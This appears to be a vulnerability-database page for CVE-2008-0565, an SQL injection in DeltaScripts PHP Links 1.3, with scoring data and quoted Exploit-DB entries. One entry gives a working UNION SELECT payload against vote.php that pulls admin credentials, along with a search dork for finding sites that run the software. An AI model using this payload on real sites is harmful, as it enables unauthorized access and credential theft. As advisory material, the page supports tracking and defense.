CVE-2008-0565
published 2008-02-05CVE-2008-0565: SQL injection vulnerability in vote.php in DeltaScripts PHP Links 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.06%
60.3th percentile
SQL injection vulnerability in vote.php in DeltaScripts PHP Links 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltascripts | php_links | <= 1.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DELTAScripts PHP Links - Multiple SQL Injections
exploitdb·2012-09-10
CVE-2008-6720 DELTAScripts PHP Links - Multiple SQL Injections
DELTAScripts PHP Links - Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/55478/info
DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.
http://www.example.com/phplinks/index.php?catid=[SQL]
http://www.example.com/phplinks/review.php?id=[SQL]
http://www.example.com/phplinks/search.php?search=[SQL]
http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
http://www.example.com/phplinks/vote.ph
Exploit-DB
PHP Links 1.3 - 'id' SQL Injection
exploitdb·2008-01-30
CVE-2008-0565 PHP Links 1.3 - 'id' SQL Injection
PHP Links 1.3 - 'id' SQL Injection
---
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
= Author : Houssamix From H-T Team
= Script : PHP Links from DeltaScripts <= 1.3
= Download : http://softadmin.deltascripts.com/download.php
(PHP Links v1.3 Released 13.09.2007 )
= BUG : Remote SQL Injection Vulnerability
= Dork : Powered by PHP Links from DeltaScripts
= Exploit :
vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--
= Note : admin login http://Target/path/admin/
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
# milw0rm.com [2008-01-30]
No writeups or analysis indexed.
2008-02-05
Published